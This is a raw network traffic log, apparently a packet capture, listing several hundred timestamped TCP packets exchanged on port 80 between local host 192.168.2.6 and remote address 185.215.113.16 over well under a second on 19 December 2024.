Dec 19, 2024 10:10:12.320775032 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.320839882 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.320879936 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.321758986 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.321805000 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.321935892 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.321985960 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.322817087 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.322866917 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.322900057 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.322942019 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.323649883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.323695898 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.323827982 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.323868036 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.324709892 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.324753046 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.324796915 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.324841022 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.325763941 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.325808048 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.325851917 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.325896025 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.326816082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.326859951 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.326913118 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.326958895 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.327884912 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.327902079 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.327929020 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.327951908 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.328830957 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.328876019 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.328886986 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.328933001 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.329637051 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.329680920 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.329768896 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.329812050 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.330574036 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.330629110 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.330795050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.330838919 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.331777096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.331823111 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.331965923 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.332010984 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.332824945 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.332871914 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.332937956 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.332979918 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.333772898 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.333817959 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.333949089 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.333993912 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.334880114 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.334927082 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.335053921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.335098982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.335958004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.336004972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.336054087 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.336097002 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.337013006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.337058067 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.337073088 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.337117910 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.338139057 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.338188887 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.338233948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.338279963 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.339307070 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.339353085 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.339442015 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.339505911 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.340241909 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.340289116 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.340430021 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.340472937 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.341181993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.341228008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.341295004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.341345072 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.342257977 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.342305899 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.342380047 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.342423916 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.343260050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.343301058 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.343352079 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.343395948 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.343842983 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.343883991 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.343961954 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.344006062 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.344643116 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.344660997 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.344686031 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.344700098 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.345347881 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.345392942 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.345561028 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.345602036 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.346347094 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.346391916 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.346400976 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.346441984 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.347417116 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.347465992 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.347501040 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.347543001 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.348484993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.348503113 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.348532915 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.348546028 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.349375963 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.349420071 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.349514008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.349558115 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.350384951 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.350428104 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.490257025 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.490279913 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.490298986 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.490319014 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.490340948 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.490367889 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.491229057 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.491255045 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.491290092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.491324902 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.492098093 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.492139101 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.492149115 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.492182970 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.493073940 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.493130922 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.493165970 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.493204117 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.494060993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.494126081 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.494153023 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.494195938 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.495043993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.495089054 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.495102882 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.495141029 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.496057987 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.496104002 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.496175051 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.496210098 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.497004986 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.497046947 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.497136116 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.497174978 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.498018980 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.498060942 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.498161077 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.498200893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.499099016 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.499155045 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.505645990 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.505672932 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.505716085 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.505742073 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.506186008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.506212950 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.506237984 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.506253004 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.507004023 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.507024050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.507065058 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.508065939 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.508109093 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.508109093 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.508219957 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.508263111 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.508903027 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.508950949 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.508999109 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.509042978 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.509804964 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.509850979 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.509924889 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.509970903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.510883093 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.510900021 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.510937929 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.510950089 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.511782885 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.511831045 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.511959076 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.512006044 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.512797117 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.512844086 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.512882948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.512928009 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.513808966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.513855934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.513952017 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.513994932 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.514812946 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.514861107 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.514899015 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.514945030 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.515769958 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.515820980 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.515865088 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.515908003 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.516787052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.516828060 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.516865969 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.516911030 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.517784119 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.517828941 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.517867088 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.517901897 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.518805981 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.518834114 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.518853903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.518866062 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.519813061 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.519855022 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.519898891 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.519943953 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.520760059 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.520806074 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.520914078 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.520958900 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.521752119 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.521797895 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.521836996 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.521881104 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.522763014 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.522806883 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.522839069 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.522887945 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.523777008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.523822069 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.524096012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.524137974 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.524740934 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.524784088 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.524853945 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.524892092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.525768042 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.525811911 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.525887012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.525924921 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.526774883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.526824951 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.526881933 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.526921988 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.527745962 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.527787924 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.527877092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.527918100 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.528760910 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.528801918 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.528862000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.528903008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.529720068 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.529761076 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.529846907 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.529884100 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.530725002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.530782938 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.530827999 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.530867100 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.531732082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.531776905 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.531821966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.531862974 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.532758951 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.532804966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.532840967 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.532891989 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.533839941 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.533880949 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.533934116 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.533973932 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.534688950 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.534737110 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.534782887 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.534821033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.535697937 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.535726070 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.535749912 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.535765886 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.536696911 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.536748886 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.536796093 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.536837101 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.537674904 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.537724972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.537775993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.537817001 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.538686037 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.538738012 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.538784981 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.538829088 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.540095091 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.540154934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.540193081 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.540230989 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.540663958 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.540704966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.540726900 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.540764093 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.541656971 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.541699886 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.541764021 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.541801929 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.542673111 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.542716026 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.542778969 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.542815924 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.543636084 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.543675900 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.543739080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.543782949 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.544668913 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.544720888 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.544820070 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.544862032 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.545691013 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.545738935 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.545815945 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.545859098 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.546646118 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.546690941 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.546729088 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.546775103 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.547625065 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.547674894 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.683754921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.683783054 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.683837891 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.683865070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.683994055 CET	80	49860	185.215.113.16	192.168.2.6
